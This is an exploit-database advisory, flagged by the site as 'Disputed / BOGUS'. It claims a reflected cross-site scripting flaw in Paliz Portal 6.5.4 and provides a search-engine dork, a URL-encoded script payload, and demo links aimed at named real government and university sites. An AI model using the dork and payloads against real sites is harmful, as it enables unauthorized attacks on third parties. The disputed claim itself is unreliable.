Disputed / BOGUS

Paliz Portal 6.5.4 Cross Site Scripting vulnerability

Published
Credit
Risk
2013.07.03
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes
Dork: inurl:\"Page=search/advancedsearch\"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Exploit Title: Paliz Portal v6.5.4 Cross Site Scripting vulnerability #
#
+ Exploit Author: Ashiyane Digital Security Team #
#
+ Home : www.Ashiyane.org #
#
+ Vendor Homepage: www.palizct.com #
#
+ Version: 6.5.4 #
#
+ Category: Web Application #
#
+ Tested on: Windows 7 #
#
+ Dork: inurl:"Page=search/advancedsearch" #
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
+ Location:site/Page.aspx?search=%3Cscript%3Ealert%28/XSS/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
#
+ DEm0:http://mobinXnet.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
+ DEm0:http://www.tazirXat.gov.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch&init[Xss]
+ DEm0:http://www.gumsX.ac.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
+ DEm0:http://koXoy.ut.ac.ir/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
+ DEm0:http://www.irXobacco.com/portal/newsite/Page.aspx?search=%3Cscript%3Ealert%28/tr0janman/%29;%3C/script%3E&mID=1442&Page=search/advancedsearch[Xss]
======================================
* Greetz to: My Lord Allah
* Sp Tnx To:
Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,am118,PrinceofHacking,Alireza66,Amirh03in and all
Ashiyane Security [ Researcher Team AND Deface Team ]

* The Last One : My Self, tr0janman
*******
--------------------------------------------


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com